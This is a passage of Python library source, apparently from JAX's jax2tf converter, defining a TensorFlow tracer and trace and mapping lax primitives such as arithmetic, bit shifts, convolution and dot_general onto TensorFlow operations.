val_dtype = aval_dtype
if config.jax_enable_checks:
assert aval_dtype == val_dtype, f"expected {aval_dtype} == {val_dtype}"
for aval_dim, val_dim in util.safe_zip(
self._aval.shape, val_shape): # type: ignore[attr-defined]
if val_dim is None:
assert isinstance(
aval_dim, shape_poly.DimVar
), f"expected {self._aval.shape} == {val_shape}" # type: ignore[attr-defined]
elif not isinstance(aval_dim, shape_poly.DimVar):
assert aval_dim == val_dim, f"expected {self._aval.shape} == {val_shape}" # type: ignore[attr-defined]
else:
# We have a TF value with known shape, and the abstract shape is a shape variable.
try:
aval_int = int(_eval_shape([aval_dim])) # type: ignore
except TypeError:
continue
assert aval_int == val_dim, f"expected {self._aval.shape} == {val_shape}. Found {aval_int} != {val_dim}." # type: ignore
self.val = val
else: # Must be a numeric value
self.val = _safe_convert_to_tensor(
val, dtype=self._aval.dtype) # type: ignore[attr-defined]
@property
def aval(self):
return self._aval
def full_lower(self):
return self
class TensorFlowTrace(core.Trace):
"""Trace class that underlies the jax2tf transformation.
We are going to ensure that jax2tf.convert is never nested inside other
transformations. This is sufficient for intended use cases (converting
fully-transformed JAX code). It also simplifies our job because we do not have
to handle situations where we apply primitives on a mix of TF values and
JAX tracers from an outer transformation. E.g., for addition both the TF
values
and the JAX tracers have an override and they get confused if they see values
from the other world.
Hence a TFT trace does not interact with non-TFT traces at lower-level. For
higher-order control-flow primitives we invoke recursively
_interpret_fun on the body of the conditional, which will create a nested TFT.
We do want to allow transformations nested inside a TensorFlowTrace (TFT), but
those will introduce their own MainTrace, and any operations involving those
will be done on those traces, i.e., not a concern for TFT.
"""
def pure(self, val: Union[TfVal, core.Unit]) -> TensorFlowTracer:
"""Lifts a non-Tracer into the TensorFlowTracer.
This function may be called by way of trace.full_raise.
The value may be a core.unit. During JAX transformations we sometimes
produce a Jaxpr that has arguments of abstract value core.abstract_unit
and results equal to core.unit. These are arguments and results that are
not used in the computation.
In TF world, we represent core.unit as NaN. This is safe, as these values
should never be used.
"""
if val is core.unit:
return TensorFlowTracer(self, tf.constant(np.nan, tf.float32),
core.abstract_unit)
else:
shape, dtype = _tfval_shape_dtype(val)
return TensorFlowTracer(self, val, core.ShapedArray(shape, dtype))
def lift(self, val: core.Tracer) -> TensorFlowTracer:
# This would be called when we need to raise a tracer from a lower-level
# main into the TensorFlowTrace. Since the TensorFlowTrace is never nested
# inside another transform, there are no lower-level main traces.
assert False
def sublift(self, val: TensorFlowTracer) -> TensorFlowTracer:
# This is called when we need to raise a tracer from the same master,
# but a lower sublevel. This could come from a nested jit.
return TensorFlowTracer(self, val.val, val._aval)
def process_primitive(self, primitive: core.Primitive,
tracers: Sequence[TensorFlowTracer],
params) -> TensorFlowTracer:
impl, impl_needs_avals = self.get_primitive_impl(primitive)
args_avals: Sequence[core.AbstractValue] = tuple(t.aval for t in tracers)
out_aval = primitive.abstract_eval(*args_avals, **params)
args_tf: Sequence[TfVal] = [t.val for t in tracers]
if impl_needs_avals:
val_out: TfVal = impl(
*args_tf,
_in_avals=args_avals, # type: ignore
_out_aval=out_aval,
**params)
else:
val_out = impl(*args_tf, **params)
if primitive.multiple_results:
out = [
TensorFlowTracer(self, v, a)
for v, a in util.safe_zip(val_out, out_aval)
] # type: ignore
else:
out = TensorFlowTracer(self, val_out, out_aval) # type: ignore
# Check that the impl rule returned a value of expected shape and dtype
# TODO: adapt this to match polymorphic shapes
if config.jax_enable_checks:
if primitive.multiple_results:
for o, expected_aval in zip(out, out_aval): # type: ignore
assert o.aval.strip_weak_type() == expected_aval.strip_weak_type(), (
f"{primitive}: out.aval = {o.aval}; expected {expected_aval}")
else:
assert out.aval == out_aval, ( # type: ignore
f"{primitive}: out.aval = {out.aval}; expected {out_aval}"
) # type: ignore
return out # type: ignore
def process_call(self, call_primitive: core.Primitive, f: lu.WrappedFun,
tracers: Sequence[TensorFlowTracer], params):
assert call_primitive.multiple_results
vals: Sequence[TfVal] = [t.val for t in tracers]
f = _interpret_subtrace(f, self.main, tuple(t.aval for t in tracers))
with core.new_sublevel():
if call_primitive == core.named_call_p:
with tf.name_scope(_sanitize_scope_name(params["name"])):
vals_out: Sequence[Tuple[TfVal, core.AbstractValue]] = \
f.call_wrapped(*vals)
elif call_primitive == sharded_jit.sharded_call_p:
vals_out = _sharded_call(f, vals, **params)
else:
vals_out = f.call_wrapped(*vals)
return [TensorFlowTracer(self, v, a) for v, a in vals_out]
def post_process_call(self, call_primitive: core.Primitive,
out_tracers: Sequence[TensorFlowTracer], params):
# We encountered a call primitive, e.g., remat_call_p, whose result
# (out_tracers) include TensorFlowTracer that were not passed through
# its arguments (captured from the environment).
vals = tuple(t.val for t in out_tracers)
main = self.main
def todo(vals: Sequence[TfVal]):
trace = TensorFlowTrace(main, core.cur_sublevel())
return [
TensorFlowTracer(trace, v, out_tracer.aval)
for v, out_tracer in util.safe_zip(vals, out_tracers)
]
return vals, todo
def process_map(self, map_primitive, f, tracers, params):
raise NotImplementedError("process_map")
def post_process_map(self, map_primitive, out_tracers, params):
raise NotImplementedError("post_process_map")
def process_custom_jvp_call(self, prim, fun, jvp, tracers):
# Drop the custom differentiation rule and act like a call primitive. This
# behavior is desirable because jax2tf stages code out of the JAX system, so
# there are no more JAX differentiation transformations to be applied.
del jvp # Unused.
return self.process_call(core.call_p, fun, tracers, {})
def post_process_custom_jvp_call(self, out_tracers, params):
assert False # unreachable assuming jax2tf runs with clean trace state
def process_custom_vjp_call(self, prim, fun, fwd, bwd, tracers, out_trees):
# Drop the custom differentiation rule and act like a call primitive. This
# behavior is desirable because jax2tf stages code out of the JAX system, so
# there are no more JAX differentiation transformations to be applied.
del fwd, bwd, out_trees # Unused.
return self.process_call(core.call_p, fun, tracers, {})
def post_process_custom_vjp_call(self, out_tracers, params):
assert False # unreachable assuming jax2tf runs with clean trace state
def get_primitive_impl(self, p: core.Primitive) -> Tuple[Callable, bool]:
# Returns the primitive implementation and whether the implementation
# takes abstract values (see definition of tf_impl_with_avals)
try:
return tf_impl[p], False
except KeyError:
try:
return tf_impl_with_avals[p], True
except KeyError as err:
msg = "TensorFlow interpretation rule for '{}' not implemented"
raise NotImplementedError(msg.format(p)) from err
def to_tf_dtype(jax_dtype):
if jax_dtype == dtypes.float0:
jax_dtype = dtypes.bfloat16
return tf.dtypes.as_dtype(jax_dtype)
def to_jax_dtype(tf_dtype):
return tf_dtype.as_numpy_dtype
def _unexpected_primitive(p: core.Primitive, *args, **kwargs):
assert False, f"Encountered unexpected primitive {p}"
for unexpected in xla.call_translations: # Call primitives are inlined
tf_impl[unexpected] = functools.partial(_unexpected_primitive, unexpected)
# Primitives that are not yet implemented must be explicitly declared here.
tf_not_yet_impl = [
"reduce",
"rng_uniform",
"clz",
"igamma_grad_a",
"random_gamma_grad",
"reduce_precision",
# Not high priority?
"after_all",
"all_to_all",
"create_token",
"infeed",
"outfeed",
"pmax_p",
"pmin",
"ppermute",
"psum",
"pmax",
"pgather",
"axis_index",
"pdot",
"all_gather",
"lu_pivots_to_permutation",
"rng_bit_generator",
"xla_pmap",
"call_tf",
]
tf_impl[ad_util.stop_gradient_p] = tf.stop_gradient
tf_impl[ad_util.zeros_like_p] = tf.zeros_like
def _add(x: TfVal, y: TfVal) -> TfVal:
return tf.raw_ops.AddV2(x=x, y=y)
tf_impl[ad_util.add_jaxvals_p] = _add
tf_impl[xla.device_put_p] = lambda x, device=None: x
tf_impl[lax.neg_p] = tf.math.negative
def _sign(x: TfVal) -> TfVal:
if x.dtype.is_unsigned:
# TF and XLA do not support tf.math.sign for unsigned types.
return tf.where(
tf.math.equal(x, 0), np.array(0, dtype=x.dtype),
np.array(1, dtype=x.dtype))
else:
return tf.math.sign(x)
tf_impl[lax.sign_p] = _sign
tf_impl[lax.floor_p] = tf.math.floor
tf_impl[lax.ceil_p] = tf.math.ceil
def _round(operand, *, rounding_method):
if rounding_method is lax.RoundingMethod.AWAY_FROM_ZERO:
sign = _sign(operand)
operand *= sign
floor = tf.math.floor(operand)
operand -= floor
cond = tf.math.equal(operand, tf.constant(np.array(0.5), operand.dtype))
return sign * (
tf.where(cond, tf.constant(np.array(1), operand.dtype),
tf.math.round(operand)) + floor)
else:
return tf.math.round(operand)
tf_impl[lax.round_p] = _round
tf_impl[lax.nextafter_p] = tf.math.nextafter
def _population_count(x):
orig_dtype = x.dtype
return tf.cast(tf.raw_ops.PopulationCount(x=x), orig_dtype)
tf_impl[lax.population_count_p] = _population_count
tf_impl[lax.is_finite_p] = tf.math.is_finite
def _abs(x: TfVal) -> TfVal:
# TF and XLA do not support tf.math.abs for unsigned types.
return tf.math.abs(x) if not x.dtype.is_unsigned else x
tf_impl[lax.abs_p] = _abs
tf_impl[lax.pow_p] = tf.math.pow
def _integer_pow(x, *, y: int, _in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
# Follows the implementation in lax._integer_pow_translation_rule
if y == 0:
return tf.broadcast_to(
tf.constant(1, dtype=x.dtype, shape=()), _eval_shape(_out_aval.shape))
is_reciprocal = y < 0
if is_reciprocal:
y = -y
acc = None
while y > 0:
if y & 1:
acc = x if acc is None else tf.math.multiply(acc, x)
y >>= 1
if y > 0:
x = tf.math.multiply(x, x)
return tf.math.reciprocal(acc) if is_reciprocal else acc
tf_impl_with_avals[lax.integer_pow_p] = _integer_pow
tf_impl[lax.exp_p] = tf.math.exp
tf_impl[lax.expm1_p] = tf.math.expm1
tf_impl[lax.log_p] = tf.math.log
tf_impl[lax.log1p_p] = tf.math.log1p
tf_impl[lax.tan_p] = tf.math.tan
tf_impl[lax.tanh_p] = tf.math.tanh
tf_impl[lax.sin_p] = tf.math.sin
tf_impl[lax.sinh_p] = tf.math.sinh
tf_impl[lax.cos_p] = tf.math.cos
tf_impl[lax.cosh_p] = tf.math.cosh
tf_impl[lax.acos_p] = tf.math.acos
tf_impl[lax.asin_p] = tf.math.asin
tf_impl[lax.atan_p] = tf.math.atan
tf_impl[lax.atan2_p] = tf.math.atan2
tf_impl[lax.acosh_p] = tf.math.acosh
tf_impl[lax.atanh_p] = tf.math.atanh
tf_impl[lax.asinh_p] = tf.math.asinh
tf_impl[lax.sqrt_p] = tf.math.sqrt
tf_impl[lax.rsqrt_p] = tf.math.rsqrt
tf_impl[lax.lgamma_p] = tf.math.lgamma
tf_impl[lax.digamma_p] = tf.math.digamma
tf_impl[lax.igamma_p] = tf.math.igamma
tf_impl[lax.igammac_p] = tf.math.igammac
tf_impl[lax.regularized_incomplete_beta_p] = tf.math.betainc
tf_impl[lax.erf_p] = tf.math.erf
tf_impl[lax.erfc_p] = tf.math.erfc
tf_impl[lax.erf_inv_p] = tf.math.erfinv
tf_impl[lax.bessel_i0e_p] = tf.math.bessel_i0e
tf_impl[lax.bessel_i1e_p] = tf.math.bessel_i1e
tf_impl[lax.complex_p] = tf.complex
def _conj(x, **kwargs):
# The only dtypes that are allowed are: float32, float64, complex64, and
# complex128.
if x.dtype == tf.float32:
return tf.cast(x, tf.complex64)
elif x.dtype == tf.float64:
return tf.cast(x, tf.complex128)
else:
return tf.math.conj(x)
tf_impl[lax.conj_p] = _conj
tf_impl[lax.real_p] = tf.math.real
tf_impl[lax.imag_p] = tf.math.imag
tf_impl[lax.add_p] = _add
tf_impl[lax.sub_p] = tf.math.subtract
tf_impl[lax.mul_p] = tf.math.multiply
def _iota(*, dtype, shape, dimension):
dtype = to_tf_dtype(dtype)
# Some dtypes are unsupported, like uint32, so we just fall back to int32.
# TODO(mattjj, necula): improve tf.range dtype handling
shape_tf = _eval_shape(shape)
vec = tf.range(tf.cast(shape_tf[dimension], tf.int32), dtype=tf.int32)
vec_shape = [-1 if i == dimension else 1 for i in range(len(shape))]
return tf.cast(tf.broadcast_to(tf.reshape(vec, vec_shape), shape_tf), dtype)
tf_impl[lax.iota_p] = _iota
def _div(lhs, rhs):
if lhs.dtype.is_integer:
quotient = tf.math.floordiv(lhs, rhs)
select = tf.math.logical_and(
tf.not_equal(_sign(lhs), _sign(rhs)),
tf.not_equal(tf.math.floormod(lhs, rhs), 0))
return tf.where(select, quotient + 1, quotient)
else:
return tf.math.truediv(lhs, rhs)
def _rem(lhs, rhs):
return _sign(lhs) * tf.math.floormod(_abs(lhs), _abs(rhs))
tf_impl[lax.div_p] = _div
tf_impl[lax.rem_p] = _rem
tf_impl[lax.max_p] = tf.math.maximum
tf_impl[lax.min_p] = tf.math.minimum
# Map from TF signed types to TF unsigned types.
_SIGNED_TO_UNSIGNED_TABLE = {
tf.int8: tf.uint8,
tf.int16: tf.uint16,
tf.int32: tf.uint32,
tf.int64: tf.uint64,
}
# Map from TF unsigned types to TF signed types.
_UNSIGNED_TO_SIGNED_TABLE = {u: s for s, u in _SIGNED_TO_UNSIGNED_TABLE.items()}
# Note: Bitwise operations only yield identical results on unsigned integers!
# pylint: disable=protected-access
def _shift_right_arithmetic_raw(x, y):
if x.dtype.is_unsigned:
assert x.dtype == y.dtype
orig_dtype = x.dtype
signed_dtype = _UNSIGNED_TO_SIGNED_TABLE[orig_dtype]
x = tf.cast(x, signed_dtype)
y = tf.cast(y, signed_dtype)
res = tf.bitwise.right_shift(x, y)
return tf.cast(res, orig_dtype)
else:
return tf.bitwise.right_shift(x, y)
def _shift_right_arithmetic(x, y):
# TF shift is "implementation defined" if the shift amount is negative
# or larger or equal to the size of the value. We implement the XLA
# semantics to return the shift by the max value (x_bits - 1).
# TODO: it is likely better to add XlaOps for shifts
x_bits = 8 * x.dtype.size
clamp_y = tf.where(_shift_in_bounds(x, y), y, x_bits - 1)
return _shift_right_arithmetic_raw(x, clamp_y)
tf_impl[lax.shift_right_arithmetic_p] = _shift_right_arithmetic
def _shift_right_logical_raw(x, y):
if x.dtype.is_unsigned:
return tf.bitwise.right_shift(x, y)
else:
assert x.dtype == y.dtype
orig_dtype = x.dtype
unsigned_dtype = _SIGNED_TO_UNSIGNED_TABLE[orig_dtype]
x = tf.cast(x, unsigned_dtype)
y = tf.cast(y, unsigned_dtype)
res = tf.bitwise.right_shift(x, y)
return tf.cast(res, orig_dtype)
def _shift_right_logical(x, y):
# TF shift is "implementation defined" if the shift amount is negative
# or larger or equal to the size of the value. We implement the XLA semantics
# to return 0.
# TODO: it is likely better to add XlaOps for shifts
return tf.where(
_shift_in_bounds(x, y), _shift_right_logical_raw(x, y), tf.zeros_like(x))
tf_impl[lax.shift_right_logical_p] = _shift_right_logical
def _shift_left(x, y):
# TF shift is "implementation defined" if the shift amount is negative
# or larger or equal to the size of the value. We implement the XLA semantics
# to return 0.
# TODO: it is likely better to add XlaOps for shifts
return tf.where(
_shift_in_bounds(x, y), tf.bitwise.left_shift(x, y), tf.zeros_like(x))
tf_impl[lax.shift_left_p] = _shift_left
def _shift_in_bounds(x: TfVal, y: TfVal) -> TfVal:
# Return the TF expression for when y is within bounds (0 <= y < |x|)
x_bits = 8 * x.dtype.size
# TF does not have comparisons for uint16 and uint32 (despite what the
# documentation says)
y_comp = tf.cast(
y, _UNSIGNED_TO_SIGNED_TABLE[y.dtype]) if y.dtype.is_unsigned else y
y_lt_x_bits = tf.math.less(y_comp, x_bits)
y_ge_0 = tf.math.greater_equal(y_comp, 0)
return tf.logical_and(y_lt_x_bits, y_ge_0)
def _not(x):
"""Computes bitwise not with support for booleans.
Numpy and JAX support bitwise not for booleans by applying a logical not!
This means that applying bitwise_not yields an unexected result:
jnp.bitwise_not(jnp.array([True, False]))
>> DeviceArray([False, True], dtype=bool)
if you assume that booleans are simply casted to integers.
jnp.bitwise_not(jnp.array([True, False]).astype(np.int32)).astype(bool)
>> DeviceArray([True, True], dtype=bool)
"""
if x.dtype == tf.bool:
return tf.logical_not(x)
else:
return tf.bitwise.invert(x)
tf_impl[lax.not_p] = _not
def bool_to_int8(f, argnums):
"""Computes bool valued functions using int8."""
argnums = tf.nest.flatten(argnums)
def wrapper(*args, **kwargs):
if not any(args[i].dtype == tf.bool for i in argnums):
return f(*args, **kwargs)
else:
args_cast = [(tf.cast(a, tf.int8) if i in argnums else a)
for i, a in enumerate(args)]
if "_in_avals" in kwargs:
def cast_aval(aval):
return core.ShapedArray(aval.shape, np.int8)
_in_avals_cast = [
cast_aval(aval) if i in argnums else aval
for i, aval in enumerate(kwargs["_in_avals"])
]
_out_aval_cast = tf.nest.map_structure(cast_aval, kwargs["_out_aval"])
kwargs = dict(
kwargs, _in_avals=_in_avals_cast, _out_aval=_out_aval_cast)
out = f(*args_cast, **kwargs)
return tf.nest.map_structure(lambda o: tf.cast(o, tf.bool), out)
return wrapper
tf_impl[lax.or_p] = bool_to_int8(tf.bitwise.bitwise_or, argnums=(0, 1))
tf_impl[lax.and_p] = bool_to_int8(tf.bitwise.bitwise_and, argnums=(0, 1))
tf_impl[lax.xor_p] = bool_to_int8(tf.bitwise.bitwise_xor, argnums=(0, 1))
tf_impl[lax.eq_p] = tf.math.equal
tf_impl[lax.ne_p] = tf.math.not_equal
tf_impl[lax.ge_p] = tf.math.greater_equal
tf_impl[lax.gt_p] = tf.math.greater
tf_impl[lax.le_p] = tf.math.less_equal
tf_impl[lax.lt_p] = tf.math.less
tf_impl[lax_linalg.cholesky_p] = tf.linalg.cholesky
def _convert_element_type(operand, *, new_dtype, weak_type=False):
old_dtype = operand.dtype.as_numpy_dtype
if (dtypes.issubdtype(old_dtype, np.complexfloating) and
not dtypes.issubdtype(new_dtype, np.complexfloating)):
operand = tf.math.real(operand)
if (dtypes.issubdtype(old_dtype, np.floating) and
not (dtypes.issubdtype(new_dtype, np.floating) or dtypes.issubdtype(
new_dtype, np.complexfloating) or new_dtype == np.bool_)):
sign = _sign(operand)
operand = sign * tf.math.floor(sign * operand)
return tf.dtypes.cast(operand, to_tf_dtype(new_dtype))
tf_impl[lax.convert_element_type_p] = _convert_element_type
def _bitcast_convert_type(operand, new_dtype):
return tf.bitcast(operand, to_tf_dtype(new_dtype))
tf_impl[lax.bitcast_convert_type_p] = _bitcast_convert_type
def _clamp(minval, operand, maxval, *, _in_avals, _out_aval):
# The below permits mirroring the behavior of JAX when maxval < minval
op_shape_tf_val = _eval_shape(_in_avals[1].shape)
maxval = tf.broadcast_to(maxval, op_shape_tf_val)
minval = tf.math.minimum(tf.broadcast_to(minval, op_shape_tf_val), maxval)
return tf.clip_by_value(operand, minval, maxval)
tf_impl_with_avals[lax.clamp_p] = _clamp
def _concatenate(*operands, dimension):
return tf.concat(operands, axis=dimension)
tf_impl[lax.concatenate_p] = _concatenate
def _conv_general_dimension_numbers_proto(dimension_numbers):
"""Converts a ConvDimensionNumbers to an XLA ConvolutionDimensionNumbers."""
assert isinstance(dimension_numbers, lax.ConvDimensionNumbers)
lhs_spec, rhs_spec, out_spec = dimension_numbers
proto = xla_data_pb2.ConvolutionDimensionNumbers()
proto.input_batch_dimension = lhs_spec[0]
proto.input_feature_dimension = lhs_spec[1]
proto.output_batch_dimension = out_spec[0]
proto.output_feature_dimension = out_spec[1]
proto.kernel_output_feature_dimension = rhs_spec[0]
proto.kernel_input_feature_dimension = rhs_spec[1]
proto.input_spatial_dimensions.extend(lhs_spec[2:])
proto.kernel_spatial_dimensions.extend(rhs_spec[2:])
proto.output_spatial_dimensions.extend(out_spec[2:])
return proto
def _precision_config_proto(precision: Optional[Tuple[PrecisionType,
PrecisionType]]):
"""Convert an integer to an XLA.PrecisionConfig."""
if precision is None:
return None
proto = xla_data_pb2.PrecisionConfig()
proto.operand_precision.append(int(precision[0]))
proto.operand_precision.append(int(precision[1]))
return proto
def _try_tf_conv(lhs, rhs, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count, batch_group_count,
preferred_element_type: Optional[DType],
out_shape) -> TfVal:
def error(msg):
suffix = ("See source code for the precise conditions under which "
"convolutions can be converted without XLA.")
return _xla_disabled_error("conv_general_dilated", f"{msg} - {suffix}")
# TODO(bchetioui): this function is not exhaustive wrt which convolution cases
# can be translated into TF primitives. Further investigation is needed to
# fully flesh it out.
if lhs.dtype not in [tf.float16, tf.float32, tf.float64]:
raise error(f"tf.nn.convolution is not supported for dtype {lhs.dtype}")
if feature_group_count != 1:
raise error("tf.nn.convolution does not support grouped convolutions")
# TODO(bchetioui): is there something to do with batch_group_count?
if batch_group_count != 1:
raise error("Unimplemented support for batch_group_count != 1")
nb_spatial_dimensions = len(lhs.shape) - 2
# TF can only deal with 1D, 2D and 3D convolution
if nb_spatial_dimensions < 1 or nb_spatial_dimensions > 3:
raise error("TensorFlow can only handle convolutions with 1, 2, or 3 "
"spatial dimensions")
# TODO(bchetioui): handle different stride cases
if list(window_strides) != [1] * nb_spatial_dimensions:
raise error("Unimplemented support for window_strides != "
f"{tuple([1] * nb_spatial_dimensions)}")
if preferred_element_type is not None and preferred_element_type != lhs.dtype:
raise error("Unimplemented support for preferred_element_type")
def convert_padding() -> str:
# TODO(bchetioui): in this instance, we can not use padtype_to_pads as
# string padding is not implemented for transposed convolution.
if list(lhs_dilation) != [1] * nb_spatial_dimensions:
raise error("Padding conversion is not supported for transposed "
"convolution.")
lhs_perm, rhs_perm, _ = dimension_numbers
effective_rhs_shape = [
(k - 1) * r + 1
for k, r in zip(np.take(rhs.shape, rhs_perm)[2:], rhs_dilation)
]
lhs_shape = np.take(lhs.shape, lhs_perm)[2:]
# TF only allows 'VALID' and 'SAME' padding
for pad_str in ["VALID", "SAME"]:
gen_padding = lax.padtype_to_pads(
lhs_shape, effective_rhs_shape, window_strides, pad_str)
if list(gen_padding) == list(padding):
return pad_str
raise error("Input padding not supported in TensorFlow.")
def convert_dim_nums() -> str:
lhs_spec, rhs_spec, out_spec = dimension_numbers
# TF only allows filters with shape:
# spatial_filter_shape + [in_channels, out_channels]. In JAX however,
# rhs_spec is represented as a tuple containing the following:
# [out_channels, in_channels] + spatial_filter_shape.
supported_rhs_shape = ([nb_spatial_dimensions + 1, nb_spatial_dimensions] +
list(range(nb_spatial_dimensions)))
if list(rhs_spec) != supported_rhs_shape:
raise error("Input filter (RHS) shape format not supported in "
"TensorFlow.")
# TF only supports same LHS and output data format
if lhs_spec != out_spec:
raise error("TensorFlow requires the same data format for LHS and "
"output.")
# Alphabet extracted from the documentation of tf.conv{1,2,3}d
spatial_dim_alphabet = "DHW"[-nb_spatial_dimensions:]
# TF only supports the following data formats:
# - [batch_size, in_channels] + input_spatial_shape
# TODO(bchetioui): TF currently does not support the above on CPU. To avoid
# failing on this platform, this path is commented out for now.
# if list(lhs_spec) == list(range(len(lhs_spec))):
# return "NC" + spatial_dim_alphabet
# - [batch_size] + input_spatial_shape + [in_channels]
if list(lhs_spec) == ([0, len(lhs_spec) - 1] +
list(range(1,
len(lhs_spec) - 1))):
return "N" + spatial_dim_alphabet + "C"
raise error("Data format is unsupported by TensorFlow.")
def convert_dilation_and_compute_result(tf_padding: str,
tf_dim_nums: str) -> TfVal:
no_dilation = [1] * nb_spatial_dimensions
# TODO(bchetioui): is there a generic way to do a transposed atrous
# convolution in TensorFlow?
if not (list(lhs_dilation) == no_dilation or
list(rhs_dilation) == no_dilation):
raise error("Both LHS and RHS dilations are set.")
# This is a non-dilated or atrous convolution
if list(lhs_dilation) == no_dilation:
return tf.nn.convolution(
lhs,
rhs,
strides=window_strides,
padding=tf_padding,
data_format=tf_dim_nums,
dilations=rhs_dilation)
# TODO(bchetioui): the below path is unreachable for now, as passing a lhs
# dilation to this function will result in convert_padding returning None
# systematically. This must be investigated further.
# Dilation of the LHS is transposed convolution
return tf.nn.conv_transpose(
lhs,
rhs,
out_shape,
window_strides,
padding=tf_padding,
data_format=tf_dim_nums,
dilations=lhs_dilation)
tf_padding = convert_padding()
tf_dim_nums = convert_dim_nums()
return convert_dilation_and_compute_result(tf_padding, tf_dim_nums)
def _conv_general_dilated(lhs, rhs, *,
window_strides, padding, lhs_dilation,
rhs_dilation,
dimension_numbers: lax.ConvDimensionNumbers,
feature_group_count: int,
batch_group_count: int,
lhs_shape: Sequence[int],
rhs_shape: Sequence[int],
precision: Optional[Tuple[PrecisionType, PrecisionType]],
preferred_element_type: Optional[DType],
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
"""Implementation of lax.conv_general_dilated_p using XlaConv."""
out_tf_shape = _aval_to_tf_shape(_out_aval)
if not _enable_xla:
return _try_tf_conv(
lhs, rhs, window_strides, padding, lhs_dilation, rhs_dilation,
dimension_numbers, feature_group_count, batch_group_count,
preferred_element_type, out_tf_shape)
dnums_proto = _conv_general_dimension_numbers_proto(dimension_numbers)
precision_config_proto = _precision_config_proto(precision)
assert batch_group_count == 1 # TODO(necula): implement batch_group_count
def gen_conv(lhs, rhs, preferred_element_type: Optional[DType]):
out = tfxla.conv(
lhs,
rhs,
window_strides,
padding,
lhs_dilation,
rhs_dilation,
dnums_proto,
feature_group_count=feature_group_count,
precision_config=precision_config_proto,
preferred_element_type=preferred_element_type)
# TODO: implement shape inference for XlaConv
out.set_shape(out_tf_shape)
return out
# Follow the lowering for complex convolutions from
# lax._conv_general_dilated_translation. We can use the same conversion on all
# platforms because on XLA:TPU the compiler does the same as a rewrite.
if np.issubdtype(_in_avals[0].dtype, np.complexfloating):
if preferred_element_type is not None:
# Convert complex dtype to types used for real and imaginary parts
assert np.issubdtype(preferred_element_type, np.complexfloating)
preferred_float_et = (
np.float64 if preferred_element_type == np.complex128 else np.float32)
else:
preferred_float_et = None
lhs_real, lhs_imag = tf.math.real(lhs), tf.math.imag(lhs)
rhs_real, rhs_imag = tf.math.real(rhs), tf.math.imag(rhs)
k1 = gen_conv(_add(lhs_real, lhs_imag), rhs_real, preferred_float_et)
k2 = gen_conv(lhs_real, tf.math.subtract(rhs_imag, rhs_real),
preferred_float_et)
k3 = gen_conv(lhs_imag, _add(rhs_real, rhs_imag), preferred_float_et)
return tf.complex(tf.math.subtract(k1, k3), _add(k1, k2))
else:
return gen_conv(lhs, rhs, preferred_element_type)
tf_impl_with_avals[lax.conv_general_dilated_p] = _conv_general_dilated
def _dot_general(lhs, rhs, *, dimension_numbers,
precision: Optional[Tuple[PrecisionType, PrecisionType]],
preferred_element_type: Optional[DType],
_in_avals: Sequence[core.AbstractValue],
_out_aval: core.AbstractValue):
"""Implementation of lax.dot_general_p in terms of tf.linalg.einsum."""
(lhs_contracting, rhs_contracting), (lhs_batch, rhs_batch) = dimension_numbers
lhs_ndim, rhs_ndim = len(lhs.shape), len(rhs.shape)
if _enable_xla:
dnums_proto = xla_data_pb2.DotDimensionNumbers()
dnums_proto.lhs_contracting_dimensions.extend(lhs_contracting)
dnums_proto.rhs_contracting_dimensions.extend(rhs_contracting)
dnums_proto.lhs_batch_dimensions.extend(lhs_batch)
dnums_proto.rhs_batch_dimensions.extend(rhs_batch)
precision_config_proto = _precision_config_proto(precision)
res = tfxla.dot_general(
lhs,
rhs,
dnums_proto,
precision_config_proto,
preferred_element_type=preferred_element_type)
# TODO: in presence of None dimensions, XlaDot shape inference returns
# unknown shape.
res.set_shape(_aval_to_tf_shape(_out_aval))
return res
# This condition ensures that:
# 1) the batch dimensions are ordered in the same way in lhs and rhs (this is
# not strictly necessary, but we would have to reshape the array if that
# were not the case;
# 2) lhs and rhs have the same number of dimensions +/- 1
# 3) the number of non-batch dimensions in both tensors is either 1 or 2
# 4) the contracting dimensions are consistent with those of a classic
# matrix/matrix, vector/matrix or matrix/vector multiplication.
if (lhs_batch == rhs_batch == tuple(range(len(lhs_batch))) and
lhs_ndim - rhs_ndim in [-1, 0, 1] and
1 <= lhs_ndim - len(lhs_batch) <= 2 and
1 <= rhs_ndim - len(rhs_batch) <= 2 and
lhs_contracting == (len(lhs.shape) - 1,) and
rhs_contracting == (len(lhs_batch),)):
# All the inputs to tf.linalg.matmul must have 2 inner dimensions,
# after their batch dimensions, so we need to expand the dimensions
# appropriately. We can get to this branch with three combinations of
# inner shapes:
# - lhs.inner_shape == [a, b], rhs.inner_shape == [b, c]
# - in this case, the resulting inner shape is [a, c];
# - lhs.inner_shape == [b] , rhs.inner_shape == [b, c]
# - in this case, we need to expand lhs to [1, b], and the resulting
# shape is [c]. We need to squeeze the result of tf.linalg.matmul
# as it will have shape [1, c];
# - lhs.shape == [batch] + [a, b], rhs.shape == [batch] + [b]
# - in this case, we need to expand rhs to [b, 1], and the resulting
# shape is [a]. We need to squeeze the result of tf.linalg.matmul
# as it will have shape [a, 1];
# - lhs.shape == [batch] + [b] , rhs.shape == [batch] + [b]
# - in this case, we need to expand lhs to [1, b] and rhs to [b, 1],
# and the resulting shape is (). We need to squeeze the result of
# tf.linalg.matmul as it will have shape [1, 1].
squeeze_idxs = []
if lhs_ndim - len(lhs_batch) == 1:
lhs = tf.expand_dims(lhs, lhs_ndim - 1)
squeeze_idxs.append(len(lhs.shape) - 2)
if rhs_ndim - len(rhs_batch) == 1:
rhs = tf.expand_dims(rhs, rhs_ndim)
squeeze_idxs.append(len(rhs.shape) - 1)
result = tf.linalg.matmul(lhs, rhs)
if len(squeeze_idxs) != 0:
assert all([result.shape[i] == 1 for i in squeeze_idxs])
result = tf.squeeze(result, squeeze_idxs)
return result
new_id = iter(string.ascii_letters)
lhs_axis_ids = [next(new_id) for _ in lhs.shape]
rhs_axis_ids = [next(new_id) for _ in rhs.shape]
lhs_out_axis_ids = lhs_axis_ids[:]
rhs_out_axis_ids = rhs_axis_ids[:]
for lhs_axis, rhs_axis in zip(lhs_contracting, rhs_contracting):
shared_id = next(new_id)
lhs_axis_ids[lhs_axis] = shared_id
rhs_axis_ids[rhs_axis] = shared_id
lhs_out_axis_ids[lhs_axis] = None # type: ignore[call-overload]
rhs_out_axis_ids[rhs_axis] = None # type: ignore[call-overload]
batch_ids = []
for lhs_axis, rhs_axis in zip(lhs_batch, rhs_batch):
shared_id = next(new_id)
lhs_axis_ids[lhs_axis] = shared_id
